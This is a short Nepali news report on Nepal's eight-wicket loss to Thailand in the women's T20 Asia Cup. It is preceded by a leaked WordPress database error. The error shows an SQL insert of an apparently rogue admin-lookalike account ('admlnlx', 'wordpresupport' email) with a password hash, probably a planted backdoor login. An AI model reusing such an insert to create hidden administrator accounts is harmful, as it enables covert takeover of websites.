WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/2.7iteULfTK8u1Kvd36Ox5rYDs5B0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-19 17:27:35', '', 'admlnlx', 'admlnlx')
काठमाडौं,मंसिर १६-
एशिया कप महिला ट्वान्टी ट्वान्टी क्रिकेट प्रतियोगिताको आफ्नो चौथो खेलमा नेपाल आयोजक थाइल्याण्डसँग ८ विकेटले पराजित भएको छ ।
प्रतियोगितामा लगातार चौथो पराजय स्वीकार गर्ने क्रममा नेपाल एसोसियट प्रतिद्धन्दी थाइल्याण्डसँग पनि कमजोर प्रदर्शन गर्यो । नेपालले दिएको ६४ रनको लक्ष्य घरेलु टोलीले २ विकेट गुमाएर ४ ओभर बाँकी छँदै पूरा गर्यो ।
उसका लागि ओपनरहरु नात्ताकान चान्तमले २४ र सिरिन्त्राले अविजित २७ रन बनाइन् । नेपालकी सीता मगरले दुई विकेट लिइन् ।
यसअघि टस जितेर ब्याटिङ रोजेको नेपालले इनिङको एक बल बाँकी छँदा सबै विकेट गुमाएर ६३ रनको झिनो योगफल बनाएको थियो । नेपालका लागि ओपनर ज्योती पाण्डेले १६ रन जोड्नुबाहेक अन्यले दोहोरो अंकको रन बनाउन सकेनन् । नेपालले ११ अतिरिक्त रन पाएको थियो ।
यसअघि टेष्ट टोलीहरुबिरुद्ध कमजोर देखिएको नेपाल एसोसियट टोली थाइल्याण्डसँग पनि निरिह देखियो । नेपालले यसअघि पाकिस्तान, श्रीलंका र बंगलादेशसँग पराजित भएको थियो । प्रतियोगिताको अन्तिम खेलमा नेपालले भारतसँग भोलि प्रतिस्पर्धा गर्नेछ ।